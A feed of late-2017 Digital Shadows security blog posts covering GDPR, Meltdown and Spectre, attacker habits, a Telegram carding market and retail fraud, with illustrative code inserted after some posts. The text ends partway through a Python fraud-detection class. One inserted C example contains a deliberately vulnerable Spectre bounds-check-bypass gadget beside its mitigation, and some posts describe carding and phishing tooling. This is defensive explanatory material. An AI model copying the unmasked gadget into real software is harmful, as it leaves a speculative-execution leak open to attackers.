    1. Investing in a Digital Risk framework. Companies struggle to determine how much to spend on IT security, an investment many liken to insurance — no one wants to pay more than they have to. If you are a public company, spend the money to protect the business. You no longer can afford to penny pinch. The liabilities, penalties and litigation impact are significant. Companies spend an average of 6-7% of their IT budget on security technology, outside services and staff. How much an organization invests in IT security stems from a range of criteria. Companies that are consumer facing, have a large attack surface, a recognized brand, highly guarded intellectual property, and compliance requirements to industry regulations and government legislation tend to outspend their peers. The reality is organizations of all types have experienced security breaches. There remains a misplaced belief in “security by obscurity” among organizations with lesser known brands, smaller attack surface, and less stringent industry regulations. The situation in the last 2-3 years has changed substantially. With so many global state actors and well-funded cybercrime organizations, IT security costs are increasing rapidly.

    The right answer does not start with a dollar figure, but companies should work through a Digital Risk management process. As a publicly listed company, you can no longer take an ad hoc approach, basing your budgeting decisions on trial and error, or reacting to problems as they arise instead of proactively approaching a security framework. This process is monitored and repeated (both internal networks and the external environment where your assets may have leaked through malicious actions or unintentionally lying in the open) and shortcomings addressed over time. This simple yet time-consuming process is undertaken by not only large public companies but also midmarket and small businesses who face the same cyber risks but typically with fewer IT security resources. With cybercrime advancing at unprecedented levels, companies must proactively implement a security risk management framework, develop technology internally, hire or outsource security professionals commensurate with your risk, train all employees on security awareness, and have a real-time incident response playbook that balances digital threat intelligence and risk mitigation.


    Want to learn more around GDPR and your team’s role in compliance and digital risk management? Download our latest report, “The Path to GDPR Compliance”.


    Digital Shadows Launches Weekly Newsletter: “In the Shadows” Mon, 08 Jan 2018 10:30:07 +0000 Digital Shadows has just launched a new research-led weekly newsletter, “In the Shadows”, and podcast, “Shadow Talk”. Both highlight key findings of primary-source research our Intelligence Team is conducting, along with the latest threat actors, campaigns, security events and industry news. From technical exploit analysis to strategic insights, the content of the newsletter and podcast allows a timely and concise “analyst’s eye view” of key information security issues.

    In upcoming weeks, expect to be updated on our ongoing research into the cybercriminal underground, as well as the effect that increasing exposure and scrutiny from law enforcement has had on this community over the past few years. The latest findings can be found each week in the newsletter, here:

    The cybercriminal community has been significantly disrupted by the high-profile take-down of dark web criminal marketplaces, such as the Silk Road, HANSA and AlphaBay. Rather than overtly deterring cybercriminal activity, the prominent media coverage has, in fact, increased the number of users logging onto cybercriminal forums. What has changed significantly from the “back in the day” forums to the new generation is the trust models users are creating to ensure security.

    The Intelligence Team looks forward to sharing this research via “In the Shadows.” Stay up to date with the latest security news and trends by signing up to receive “In the Shadows”, in your inbox, every Monday:

    You can also listen to the latest research subjects discussed on “Shadow Talk”, which will feature the Digital Shadows Research and Intelligence Teams covering a hot topic in security each week.

    Hear our very first Shadow Talk podcast episode here:

    Don’t miss an episode—sign up now for updates:

    GDPR: Why You Need to Consider the Personal Data That Lies Outside of Your Organization Thu, 04 Jan 2018 21:48:41 +0000 In 2010, reports emerged that the Information Commissioner’s Office (ICO) could now fine organizations up to £500,000 ($677,000) under the Data Protection Act. Eight years later, that cap has proven woefully insufficient as a deterrent to organizations’ lax attitude towards data protection. From May 2018, organizations can be fined up to four percent of their annual global turnover or €20 million ($24 million), whichever is greater.

    While the potential fines under GDPR have attracted the headlines, our new report, GDPR: A Path to Compliance, distills some of the key changes coming and provides a framework with practical advice of how to minimize compliance challenges when the legislation (and fines) comes into force in May 2018. GDPR isn’t new, it’s been in the works since at least January 2012 when the European Commission proposed an update to data protection regulation. As the number of breaches continues to increase (albeit not necessarily publicly reported), this issue has only become more important.

    The “D” in GDPR is focused on data, and so Information Technology plays a critical role. While there must be an effort to understand what sensitive data sits within the organization, organizations must also look beyond the perimeter to understand how and where EU citizen personal data is exposed.


    First of all, organizations need to consider what is meant by “personal data”. The core definition comes from the 1995 EU Data Protection Directive (95/46/EC):

    “‘Personal data’ shall mean any information relating to an identified or identifiable natural person (‘Data Subject’); an identifiable person is one who can be identified, directly or indirectly, in particular by reference to an identification number or to one or more factors specific to his physical, physiological, mental, economic, cultural or social identity.”

    GDPR (Article 4(1)) keeps this wording but broadens it significantly by explicitly listing names, location data and online identifiers, as well as genetic factors, among the things that can identify a person.

    In reality, this means that personal data extends to far more than before – even IP addresses and browser cookies are considered to be personal data. Organizations need to be aware of what personal data they hold, either as a Controller (data about your own customers and employees) or Processor (data that you process on behalf of other organizations).

    Given this broad definition, how can organizations go about becoming GDPR compliant? Our paper sets out four key stages of GDPR compliance: discover, define, deliver, and detect. Within each of these stages, we provide advice and the key resources that organizations can turn to.

    GDPR compliance cannot be achieved easily with a shiny new widget or product. Instead, a well-thought-out program that addresses data loss management will help organizations demonstrate a high level of compliance to a regulator and minimize the commercial and reputational risks associated with a regulatory failure.

    With the scope of personal data expanded, organizations cannot simply protect their data at the boundary. Download our report to find out how to manage your data exposure in line with GDPR.

    Meltdown and Spectre: The Story So Far Thu, 04 Jan 2018 18:27:12 +0000 On Wednesday, rumors surfaced of vulnerabilities in the majority of modern microprocessors that would allow attackers to read memory belonging to the kernel, the most privileged part of a modern operating system. The kernel manages processes (starting and ending user programs), security settings and memory, and controls hardware such as disks and network interfaces.

    Later in the day the security community rallied together to produce a barrage of research on two different attacks that took advantage of these flaws: enter Meltdown and Spectre.

    With so much overlapping commentary, and further details likely to be released, it’s hard to make sense of exactly what’s going on and what systems are at risk. Here’s what we know – and do not yet know – so far. The Digital Shadows Intelligence team conducted this analysis by:

    1. Reproducing and validating the Spectre Proof of Concept Code (POC) found in the Spectre academic whitepaper,
    2. Researching criminal forums for related activity,
    3. Collating publicly available research from the security community.

    What we know about Meltdown and Spectre

    • Meltdown and Spectre were discovered by at least three different groups, including researchers at Google Project Zero, Cyberus Technology and Graz University of Technology. The flaws were responsibly disclosed back in June 2017, but details of the vulnerabilities only appeared yesterday on January 3rd. It seems the affected companies wanted to keep the news under wraps until fixes were ready to be released, but the vulnerabilities were disclosed earlier than planned.
    • Meltdown is an attack that breaks the isolation between user applications and the operating system kernel: an unprivileged process can read kernel memory, which can expose passwords and other sensitive data held there. The vulnerability is tracked as CVE-2017-5754.
    • Spectre is an attack that bypasses the isolation between applications by exploiting speculative execution, a technique modern processors use to increase performance. Under the right conditions, the processor can be tricked into speculatively loading data belonging to another application and leaking it through a side channel such as the CPU cache. The two variants are tracked as CVE-2017-5753 (bounds check bypass) and CVE-2017-5715 (branch target injection). Digital Shadows analysts tested the proof-of-concept code referenced in the Spectre whitepaper, which functioned correctly.


    Spectre proof of concept exploit tested on an Ubuntu 16.04 VM by Digital Shadows

    • Spectre is not exclusive to Intel processors; it also affects AMD and ARM. Meltdown is primarily an Intel issue, although ARM has said a small number of its cores are affected too. Cloud environments are also at risk, as an attacker could break out of one tenant’s process and read memory belonging to other processes on the same shared server.
    • Patches for Meltdown have been released (kernel page-table isolation, KPTI, on Linux, and equivalent Windows and macOS updates); there is currently no single patch for Spectre, which will likely require hardware changes to mitigate completely. US-CERT’s advisory certainly seems to take that view.
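    The bullets above describe Spectre variant 1 in words; the following is an added example, not code from the Digital Shadows post or the Spectre paper, showing the shape of the vulnerable “bounds check bypass” gadget next to the branch-free index-masking fix that the Linux kernel later adopted (array_index_mask_nospec). The arrays, their contents and the function names are constructed for illustration. It does not reproduce the leak itself (that needs a mistrained branch predictor and cache-timing measurements); it shows why the unmasked version is a gadget and how the mask keeps even a speculative out-of-range access inside the array. The mask relies on an arithmetic right shift of a negative long, which gcc and clang provide.

    ```c
    #include <limits.h>
    #include <stddef.h>
    #include <stdint.h>
    #include <stdio.h>

    #define BITS_PER_LONG (sizeof(unsigned long) * CHAR_BIT)

    /* Constructed sample data (not from the original post): a small array
     * guarded by a bounds check, and a probe array whose cache state is the
     * covert channel in a Spectre variant-1 attack. In a real attack the
     * out-of-range read past array1 lands on a secret the attacker wants. */
    #define ARRAY1_SIZE 16u
    static uint8_t array1[ARRAY1_SIZE] = {1, 2, 3, 4, 5, 6, 7, 8,
                                          9, 10, 11, 12, 13, 14, 15, 16};
    static uint8_t array2[256 * 512];

    /* Fill the probe array so that array2[v * 512] == v. This only makes the
     * victim functions return the array1 byte they looked up, so the result
     * can be checked; the attack reads the cache, not the value. */
    void setup_tables(void)
    {
        for (unsigned v = 0; v < 256; v++)
            array2[v * 512] = (uint8_t)v;
    }

    /* Vulnerable gadget (variant 1). Architecturally correct, but the branch
     * is resolved late: after training the predictor with in-range x and
     * evicting ARRAY1_SIZE's cache line, the CPU speculatively executes the
     * body for an out-of-range x, reads the secret byte array1[x], and pulls
     * array2[secret * 512] into the cache, where a timing probe recovers it. */
    uint8_t victim_unsafe(size_t x)
    {
        if (x < ARRAY1_SIZE)
            return array2[array1[x] * 512];
        return 0;
    }

    /* Branch-free mask in the style of Linux's array_index_mask_nospec():
     * all ones when index < size, zero otherwise, computed without a branch
     * the CPU could speculate past. Assumes index and size are below LONG_MAX
     * and that >> on a negative long is an arithmetic shift (gcc/clang). */
    unsigned long index_mask_nospec(unsigned long index, unsigned long size)
    {
        /* In range: both operands have the top bit clear, so v >= 0 and ~v < 0.
         * Out of range: size - 1 - index wraps, the top bit is set, ~v >= 0. */
        long v = (long)(index | (size - 1UL - index));
        return (unsigned long)(~v >> (BITS_PER_LONG - 1));
    }

    /* Clamp x with the mask: an out-of-range x becomes 0, which is inside
     * array1, so even a speculative execution never touches the secret. */
    size_t masked_index(size_t x, size_t size)
    {
        return x & index_mask_nospec(x, size);
    }

    /* Hardened gadget: same check, but the index used for the load is masked. */
    uint8_t victim_safe(size_t x)
    {
        if (x < ARRAY1_SIZE) {
            x = masked_index(x, ARRAY1_SIZE);
            return array2[array1[x] * 512];
        }
        return 0;
    }

    int main(void)
    {
        setup_tables();
        printf("mask(3,16)=%lx mask(100,16)=%lx\n",
               index_mask_nospec(3, 16), index_mask_nospec(100, 16));
        printf("unsafe(3)=%u safe(3)=%u masked_index(100,16)=%zu\n",
               victim_unsafe(3), victim_safe(3), masked_index(100, 16));
        return 0;
    }
    ```

    The alternative mitigation for the same gadget is a speculation barrier (lfence on x86) between the check and the load, which is simpler but costs more on hot paths; the mask is what Linux chose for its array accessors. Neither helps against variant 2, which needs retpolines, microcode or hardware changes.
    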

    What we don’t know about Meltdown and Spectre

    • Although the general consensus is that nearly every processor commonly in use today is at risk, the full extent of which systems and platforms are affected is still unknown.
    • How easy is it to exploit these flaws? There have not been any reports of Meltdown or Spectre attacks being performed in the wild for malicious purposes. While the Spectre POC code ran correctly in Digital Shadows’ analysis, the intricacies and feasibility of performing a Spectre attack against another machine under the right conditions, using the speculative execution approach, are still unclear.
    • How can threat actors leverage Meltdown and Spectre for their attacks? The exploit scenarios are some of the biggest unknowns. The nature of the vulnerabilities leads to the exposure of sensitive data such as encryption keys and passwords, so future attacks would likely involve attackers stealing this information to then take over machines and accounts. Internet of Things (IoT) devices are also susceptible, as they run the same kinds of processors, and people are less likely to update them the way they would their personal or work computers. A dedicated attacker could combine these vulnerabilities with the other flaws and default passwords that are already widespread in IoT devices, as the Mirai botnet demonstrated.
    • Criminals do not need to use Meltdown and Spectre for their attacks if they can profit in other ways. We have seen actors discussing the sale of the exploits on the Shadow Broker’s “Scylla Hacking Store” for $8900. This is likely to be the first of many claimed sales across the dark web and criminal forums, as cybercriminals look to profit from the media attention and hysteria around these discoveries.

    Meltdown and Spectre exploit advertised for sale by the Shadow Brokers 


    What you can do about it

    A host of companies have come out and released advisories for their affected products. We have provided a list of these and their relevant websites below:

    1. Intel
    2. Microsoft
    3. Google
    4. Amazon
    5. ARM
    6. Android
    7. Mozilla
    8. Linux
    9. Red Hat
    10. Apple

    Patching and rebooting should therefore be a priority requirement for all organizations and home users. Despite this, there are a few things to bear in mind:

    • Spectre cannot yet be completely mitigated against through patching,
    • These mitigations will affect system performance and slow down machines. You will want to test out the mitigations prior to deploying them.
    • Mitigating and patching hardware with software is very difficult, and it creates problems with other applications (e.g.: endpoint protection)

    These patches are only preliminary measures though, and there will probably be future updates released to combat the performance problems caused by these fixes.

    What we can be certain of is that this issue will run on for a considerable length of time. Digital Shadows will continue to post updates on both Meltdown and Spectre as and when new information becomes available. Happy New Year!

    What Attackers Want for Christmas Fri, 22 Dec 2017 16:41:56 +0000 Our guest author Krampus has a special blog post for the Team with the festive Red colours:

    Christmas lists are always a problem, here are some examples to get attackers thinking during the holiday season:

    • Leaked (NSA) exploits: ETERNALBLUE, ETERNALROMANCE and friends have been a rare delight this year, bringing a smile to the lips of ol’Krampus. The destruction wreaked by WannaCry, NotPetya and BadRabbit has spoken to the power of these leaked exploits. There’s nothing that Krampus likes better than gaining SYSTEM privileges directly over the network!
    • Vulnerable Supply Chain: Big or small, secondary or tertiary, supply chains have been this year’s go-to attack vector. Krampus likes to go for the weakest link in the supply chain and pivot up from there into the target, exploiting highly-connected vendors, subsidiaries and suppliers to reach the goal.
    • Poorly trained workforce: The human element is what gets naughty children on Krampus’ list, and Krampus loves the organizations that help to get them there! Not training the workforce to spot social engineering attacks, and terrifying them with the consequences of making a mistake, is a fantastic way to help attackers get what they want for Christmas.
    • Credential hygiene: While exploits are effective, other methods of gaining access shouldn’t be ignored. Poor credential hygiene has been exploited by worms like NotPetya with tremendous effect. By taking advantage of password reuse, especially for accounts with Administrator privileges, attackers have been able to compromise environments at scale in a matter of minutes. An all-time Krampus favourite!
    • Data breaches: Nothing warms Krampus’ blackened heart more than the theft of hundreds of millions of sensitive records. Data breaches provide such wonderful opportunities for theft, fraud, account takeover, credential reuse and extortion! They happen with a pleasing regularity and Krampus can only say: “bring ‘em on!”.
    • False positives: An organization may have a SOC, but luckily for ol’Krampus, they are typically flooded with false positives, which allows Krampus and friends to rampage unimpeded through their preferred targets. Misconfigured logging systems create a noisy environment where the defenders can’t see the danger until Krampus is long gone! A trusted and loyal friend over the years!
    • Target-rich environments: Once inside a particular environment, it’s always preferable for there to be a lack of segmentation so that exploits and credential reuse can be used to find vulnerable systems. In particular, sensitive data should be available in as many different places as possible and accessible by as many users as possible. This way Krampus doesn’t have to be that specific in his targeting; the naughty list can be as long as you like!

    In order to keep Krampus and his hordes out of your network, we recommend robust security engineering principles to defend your networks:

    1. Default deny: that is, “only provide access where it has been explicitly granted, otherwise deny”.
    2. Least Privilege: that is, “Every program and every privileged user of the system should operate using the least amount of privilege necessary to complete the job”.
    3. (Attack) Surface Reduction: that is, reduce the amount of services running, the number of privileged users and the number of entry points into the system.
    4. Need to Know/Compartmentalization: that is, only grant access where there is an explicit business requirement to do so.
    5. Defence in Depth: that is, not one single control is sufficient to adequately protect a system. Careful usage of the other four principles in physical, technical and administrative controls will go a long way to keeping Krampus out!

    You can find out more about these principles in a previous post we have written on the importance of security engineering.
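    The principles above are easy to state and easy to get wrong in practice, so here is an added example (not code from the Digital Shadows post) of what the first four look like once encoded in an access-control policy: a role-to-grant table that lists only what each job needs (least privilege, need to know), an evaluator that denies anything the table does not explicitly grant (default deny), a count of the exposed (role, resource, action) triples (surface reduction), and a review that compares granted permissions against observed use so unused grants can be removed. The roles, resources and usage observations are constructed for illustration.

```python
# Added example (not code from the Digital Shadows post): a small access-control
# evaluator that encodes the principles listed above. Roles, resources and
# actions are constructed for illustration.
from dataclasses import dataclass
from typing import Dict, FrozenSet, Set, Tuple


@dataclass(frozen=True)
class Grant:
    """One explicit permission: a resource and the actions allowed on it."""
    resource: str
    actions: FrozenSet[str]


# Least privilege / need to know: each role lists only what its job requires.
# Anything absent from this table is, by construction, denied.
ROLE_GRANTS: Dict[str, Tuple[Grant, ...]] = {
    "payroll_clerk": (Grant("payroll_db", frozenset({"read", "write"})),),
    "helpdesk": (
        Grant("ticket_system", frozenset({"read", "write"})),
        Grant("user_directory", frozenset({"read"})),
    ),
    "auditor": (
        Grant("payroll_db", frozenset({"read"})),
        Grant("ticket_system", frozenset({"read"})),
    ),
}


def is_allowed(role: str, resource: str, action: str) -> bool:
    """Default deny: return True only for an explicit (role, resource, action)
    grant. Unknown roles, resources and actions all fall through to False."""
    for grant in ROLE_GRANTS.get(role, ()):
        if grant.resource == resource and action in grant.actions:
            return True
    return False


def effective_permissions(role: str) -> Set[Tuple[str, str]]:
    """Expand a role's grants into the (resource, action) pairs it can use."""
    return {
        (grant.resource, action)
        for grant in ROLE_GRANTS.get(role, ())
        for action in grant.actions
    }


def attack_surface() -> int:
    """Surface reduction metric: the number of distinct (role, resource,
    action) triples the policy exposes. Shrinking this number is the goal."""
    return sum(len(effective_permissions(role)) for role in ROLE_GRANTS)


def unused_grants(
    observed_use: Dict[str, Set[Tuple[str, str]]]
) -> Dict[str, Set[Tuple[str, str]]]:
    """Least-privilege review: given the (resource, action) pairs each role was
    actually seen using (e.g. from access logs), return granted pairs that were
    never exercised. These are candidates for removal."""
    result: Dict[str, Set[Tuple[str, str]]] = {}
    for role in ROLE_GRANTS:
        unused = effective_permissions(role) - observed_use.get(role, set())
        if unused:
            result[role] = unused
    return result


if __name__ == "__main__":
    # Constructed usage observations, as a log review might produce them.
    observed = {
        "payroll_clerk": {("payroll_db", "read"), ("payroll_db", "write")},
        "helpdesk": {("ticket_system", "read"), ("ticket_system", "write")},
        "auditor": {("payroll_db", "read")},
    }
    print(is_allowed("helpdesk", "ticket_system", "write"))   # True
    print(is_allowed("helpdesk", "payroll_db", "read"))       # False: not granted
    print(is_allowed("contractor", "ticket_system", "read"))  # False: unknown role
    print(attack_surface())                                   # 7
    print(unused_grants(observed))  # helpdesk: user_directory read; auditor: ticket_system read
```

    The point of the review function is that least privilege is not a one-off decision: grants that were reasonable when issued accumulate, and comparing them against what roles actually use is how the surface gets smaller over time.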

    OL1MP: A Telegram Bot Making Carding Made Easy This Holiday Season Thu, 21 Dec 2017 16:12:04 +0000 Back in July, we published our research on the carding ecosystem, specifically on an online course that teaches carders how to successfully commit fraud. “Carding” refers to the process of using stolen credit cards to purchase goods or services, which can then be sold on at a reduced price in order to clean the money. Since the demise of AlphaBay and Hansa marketplaces, fraudsters have looked for new platforms to sell these carded goods and services.


    Figure 1: The OLYMP/OL1MP Telegram Marketplace

    Digital Shadows’ intelligence analysts have identified a Telegram market gaining traction called “OL1MP”. OL1MP has been active since August 2017 and looks to provide a new format for buying and selling these goods and services. This is all made easy by the creation of a bot to automate the browsing of these shops. OL1MP has a wide range of items for sale, including discounted hotels, drugs, taxis, driver’s licenses and documents. For example, the latter offering includes counterfeit press passes for events.

    On the back of the recent surge in Bitcoin, the market also offers a currency exchange. But it’s not the first Telegram channel to get involved in the trade of cryptocurrencies. Last month, we released research on the “Pump and Dump” schemes that seek to manipulate the price of currencies like UBQ, VCash, Chill Coin, Magi Coin, and Indorse.

    Telegram has been increasing in popularity among cybercriminals, who favor the privacy offered by its encryption. The platform is also very user friendly, and the OL1MP market is no exception. The following figures demonstrate the flow a buyer takes in choosing a service on the OL1MP market, in this case for discounted travel.

    Figure 2: Starting the OL1MP bot, with options “About the project, Escrow, Dope Shops, Services, Holidays, Taxi”


    Figure 3: With “Holidays” selected, the user is able to choose from three verified providers of travel


    Figure 4: Selecting one option, Rick Travel, takes the user to the specific group for that seller. In this case, users can book hotels for 30% of their value and flights for 50%.


    OL1MP ties in this automated effort with a human touch. As with most marketplaces, reviews are important for attracting new customers. In fact, extra discounts are available for those individuals who post pictures and positive comments from their carded holidays.

    In some instances, hotel booking agencies (among other victims) may detect this suspicious activity and cancel the reservation. So, while the functionality of this automated bot is an interesting innovation, there is still a need for human support. In addition to the creator of the OL1MP bot, the Telegram group has others who offer support on a separate channel.

    Figure 5: The profile of OL1MP’s creator


    Carding is not new, but fraudsters continually look for new ways to buy and sell carded items. The shift to Telegram is part of a broader trend, as criminals look for secure but effective ways to promote their goods and services. You can learn about what payment card companies, merchants and consumers can do to protect themselves from carding.

    ‘Tis The Season To Do Predictions – The 2018 Cybersecurity Landscape Mon, 18 Dec 2017 18:09:23 +0000 This post originally appeared on Huffington Post.

    Every year around this time all the security businesses and analysts leap for their crystal ball and attempt to predict what we should be worrying about in the coming 12 months or more. And the sad reality is that not a lot will change as there is not much need for the cybercriminal community to do anything different – it’s already working well now!

    The cybercriminal community is all about profit and that means they continue to utilise the same sorts of tactics if they continue to gain the results they are after – mainly money!

    That said though, how will the threat landscape look like over the next 12 months?

    • Supply chain and third party attacks have been a common feature in 2017 and will continue to be a fruitful attack method for cybercriminals in the next year. These tend to be highly focused operations with predetermined targets of interest, rather than cases of mass, indiscriminate targeting. Nevertheless, the Oracle MICROS breach that affected its point of sale customers and the NotPetya campaign were outliers in this regard. This is probably due to the differing motives of these campaigns: supply chain attacks are often done for intelligence gathering and reconnaissance purposes, whereas the MICROS and NotPetya attacks were financial or disruptive, so the emphasis would have been on widening the number of targets for maximum effect. Suppliers and third parties are often seen as easier entry points for attackers, especially as many do not have adequate security maturity levels. Moreover, suppliers are often given unnecessary wholesale access to company networks, which is why they are targeted in the first place.
    • Wormable malware – Some of the biggest cyber incidents in 2017 revolved around the issue of self-replicating malware that can spread between networks. WannaCry and NotPetya were examples of this. As well as these we’ve seen the BadRabbit ransomware that reportedly spreads via a combination of Windows Management Instrumentation (WMI) and the Server Message Block (SMB) protocol, and a wormable Trickbot banking trojan was also reported in July 2017.

    I expect malware modified with self-replicating capabilities to continue in 2018, particularly given the disruption caused by WannaCry and NotPetya inspiring similar attacks. Another driver for this is that many organizations around the world will be slow to mitigate against these methods, whether by applying appropriate patches and updates, restricting communication between workstations, or disabling features such as SMB to reduce the capability of malware to propagate within organization networks.

    The bar for cyber-attacks keeps getting lower. The availability of leaked tools from the NSA and HackingTeam, coupled with ‘how to’ manuals, means that threat actors will have access to powerful tools that they can iterate from and leverage to aggressively accomplish their goals.

    But whatever happens in 2018 and beyond, what is clear is that cybercrime will continue to be a problem and present governments, businesses and individuals with challenges to protect their data and their intellectual property. It is therefore critical that you take steps to manage your digital footprint and manage the digital risk you present to the World via your business activities in the internet and via cloud solutions. That way, when something bad does happen, you will know quickly and can deal with it more effectively.

    Why I Joined Digital Shadows: Product, Culture and Opportunity Wed, 13 Dec 2017 18:51:02 +0000 Making the decision to join Digital Shadows was actually a relatively straightforward decision for me, as it was impossible to turn down this unique opportunity. My decision came down to 3 main factors – product, culture, and the opportunity ahead.

    Product and Timing:

    The space we operate in is growing, and maturing, rapidly. While others are concentrating their efforts solely on social media or dark web threats, Digital Shadows SearchLight™ offers unique insight into the risks facing an organization across the broadest range of areas in our industry. This extensive coverage, coupled with our intelligence analyst expertise, allows our clients to gain a full picture of their external digital risk, without false positives, and with mitigation options. This empowers practitioners in a way that was not possible before.

    Culture and People:

    Our Co-Founders, Alastair Paterson and James Chappell, have built a truly exceptional and unique team and culture at Digital Shadows. The passion and enthusiasm that the whole company has for our SearchLight product and our clients is truly infectious. Throughout the interview process I was pleasantly surprised at how consistently the vision of Digital Shadows was echoed by those I met. The passion that the team has to ensure our clients are successful is key to our own success. That passion, through our analysts who overlay our technology, makes us truly unique in the market place.

    The Opportunity Ahead:

    The cyber security and digital risk industry is maturing quickly and we have a great opportunity through the Client Success team to differentiate ourselves from our competitors.  Through our SearchLight product and ability to build lasting trusted advisor relationships with our clients, we can ensure that their digital risks are clearly understood.


    I’m very excited about my next adventure, and look forward to creating a delighted client experience for everyone that chooses to work with us at Digital Shadows.

    A New CISO Looking to See How Deep the Rabbit Hole Goes Tue, 12 Dec 2017 17:10:06 +0000

    Well it is official, I’m now the Chief Information Security Officer here at Digital Shadows. It has been a while since I was on the practitioner side of the house and my days defending networks at the University of Texas at Dallas seem like ages ago. When I was at Forrester Research, I often joked about how much easier it was to parachute in, give some industry analyst words of wisdom and then head back to the airport. It is much easier “to say” than “to do.” The Heartbleeds, WannaCrys, and BadRabbits of the world are going to mean significantly more to me in my new practitioner role. It’s almost as if Morpheus is greeting me with a red pill, welcoming me back to the real world.

    I’ve worked with many CISOs over the years. From the Forrester Leadership Boards, to our own Customer Advisory Board here at Digital Shadows, I’ve found myself in a position to give out security program suggestions and advice to CISOs. To be honest, I always felt like a bit of an impostor; giving advice to a security and risk leader when I hadn’t been one myself. Sometimes I felt analogous to that one friend without children, who gave out parenting advice on how to get a threenager to eat more vegetables. For those with kids you know exactly what I’m talking about. Why don’t you try walking a mile in my shoes before you give me your #protips.

    I’m grateful for the opportunity and I’m very excited about this new role as it demonstrates Digital Shadows’ commitment to our customers’ security and privacy. I’m also very appreciative of the CISO network I’ve built up over the years. I will definitely reach out to my new peers for guidance and support on this new path. I also plan to blog more about my journey in the hopes that I can share my personal lessons learned with any other first time CISOs looking for guidance. Stay tuned for more.

    Digital Shadows’ Most Popular Blogs of 2017: Analysis of Competing Hypotheses For The Win Tue, 12 Dec 2017 05:55:06 +0000

    This time last year, we looked back at the blogs that caught our readers’ attention the most. In 2016, it was our Analysis of Competing Hypotheses of the Tesco Bank incident that reached the top of the pile. In 2017, it was yet another ACH that topped the Digital Shadows blog charts.

    1. WannaCry: An Analysis of Competing Hypotheses

    In May, the WannaCry ransomware spread across computer networks across the world. Despite a range of explanations offered, there was a lot of confusion as to the actors behind the campaign and their objective(s).

    Using ACH, our analysts recorded their assumptions, evidence and hypotheses on one matrix. This identified the hypotheses that were least likely to be valid. (In the end, we actually posted an additional, updated ACH as more evidence emerged.)

    This structured approach is significant as it facilitates easier collaboration and peer review. Indeed, we were happy to see others getting involved with ACHs, including a SANS Internet Storm Center handler, who did some excellent additional analysis on this area.

    ACH can’t be used in all circumstances, but the transparency it provides is useful and aligns with the values of intelligence tradecraft that Jim Marchio espoused in his paper ‘Analytic Tradecraft and the Intelligence Community: Enduring Value, Intermittent Emphasis’.

    For those ACH nerds out there, you can view all the ACHs we’ve done here:

    2. Equifax Breach: The Impact for Enterprises and Consumers

    This was arguably the biggest story of 2017, so it’s only understandable that this blog attracted plenty of readers. When events like this break, it’s always tricky to find the correct balance between a quick response and providing accurate and useful information. We’ve found that transparency helps here and use the following structure:

    1. What we know
    2. What we don’t know
    3. What we expect to happen next

    By taking this approach, we can cut through the hype and identify intelligence gaps. It’s definitely a structure we’ll be using for future breaking events.

    For those interested in lessons we can learn from the Equifax breach, check out this short paper we published:

    3. Innovation in The Underworld: Reducing the Risk of Ripper Fraud

    The final of the top three blogs of 2017 focused on the cybercriminal ecosystem, and the mechanisms criminals have in place to detect fraud from other criminals.

    Those who commit this type of fraud are known as “rippers” and there are several mechanisms in place to protect against them, including blacklists. One service, called ripper[.]cc, is an innovative approach to identifying rippers, demonstrating how professionalized the cybercriminal ecosystem has become. Ripper[.]cc allows users to identify profiles that have been previously reported, and to do so across different platforms. There’s even a Chrome plugin to make this even easier. You can read more about ripper[.]cc in this blog:

    Check out these three blogs and keep an eye out for the exciting research we have planned for 2018.

    Meet the New Wed, 29 Nov 2017 05:09:04 +0000 This morning we launched the new Digital Shadows website. Our main goal in creating this new website was to make it a valuable resource to the many security leaders and practitioners, board members, and executives who visit our website each day. We wanted to provide a view on how we are partnering with our customers to protect their company from digital risks across the open, deep, and dark web. These digital risks include cyber threats, data exposure, brand exposure, VIP exposure, infrastructure exposure, physical threats, and third party risk. We wanted to share these customers’ stories as we find that organizations both large and small, across every industry and geography, are all facing a similar and very hard task. The team here at Digital Shadows is incredibly focused on helping our customers solve these problems every day.

    We hope you enjoy our new website experience. Here are some highlights:

    1. Our new modern interactive home page with significantly more valuable content
    2. A deeper SearchLight portal experience so you can get a feel for how our service can help you monitor, manage, and remediate digital risks (just scroll down on the Home Page)
    3. A more personalized experience designed for your role, vertical, and company size
    4. A fantastic resource center that houses all of the great content our team has created that we hope is valuable to you

    Risks to Retail: Cybercriminals Sharing the Joy This Holiday Season Tue, 21 Nov 2017 23:41:33 +0000 Despite some early deals, Black Friday officially begins on 24th November, kick-starting over a month of consumer spending over the holiday period. This year, it’s expected that a whopping $862 billion will be spent during this season. A significant chunk of this is online sales, with $116 billion set to be spent. Cybercriminals also look to get a slice of the holiday sales action.

    Cybercrime and the holiday season

    In our recent webinar and whitepaper, we identify cybercrime risks to retailers and consumers:

    1. Payment Systems Risk – How cybercriminals acquire payment card information, through Point of Sale (POS) malware and skimming.
    2. Fraudulent Transactions – The monetization of this payment card information, through Card Not Present (CNP) fraud and eGift cards.
    3. Account Takeover – Fraudsters that look to log in to consumers’ accounts, be that at retailers or payment platforms. Phishing and credential stuffing are prime techniques for this.
    4. Loss of Service – With so much money spent online, the threat of Distributed Denial of Service (DDoS) is a real threat to retailers. Cybercriminals know this and look to extort companies.

    Amid all of these risks, criminals look to help each other out. For example, in one instance, an actor shared templates for phishing pages (Figure 1) on a criminal forum. This scam page is well made and has some interesting functionality, including the ability for victims to authenticate with ID cards and passport photos, and auto-redirecting victims to the legitimate site. With this template available for free, actors need only register a convincing-looking domain.


    Figure 1: An advertisement for a phishing “scampage” on a criminal forum.


    Figure 2: A screenshot of the ID upload feature from a demonstration video, which allows attackers to harvest additional information.

    Fraudsters also share software. In Figure 3 we see the AntiDetect tool, which any carder worth their salt will be using. Carders know that retailers use device fingerprinting to detect fraudulent transactions, so the ability to rotate and quickly change system components like browser type, version, language, time zone, and user agent is valuable to them. You can read more about this particular tool in an article by Brian Krebs.


    Figure 3: The AntiDetect tool to overcome browser fingerprinting controls.
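    Device fingerprinting only works as a control if the defender also looks at how fingerprints behave over time, which is where tools like the one in Figure 3 leave a trace. The following is an added example (not code from the Digital Shadows post, and not the AntiDetect tool or any retailer’s real logic) of two simple fraud heuristics run over constructed session events: an account whose browser fingerprint (user agent, Accept-Language, time zone, screen size) changes several times within a few minutes, and a single fingerprint that shows up across many accounts. Field names, user agents and account names are all constructed for illustration.

```python
# Added example (not code from the Digital Shadows post): two simple fraud
# heuristics run over constructed web-session events. It flags accounts whose
# browser fingerprint changes rapidly (the rotation behaviour described above)
# and fingerprints shared by many accounts. Field names and sample values are
# constructed for illustration; they are not real traffic.
import hashlib
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Set


class Event(NamedTuple):
    ts: datetime
    account: str
    user_agent: str
    accept_language: str
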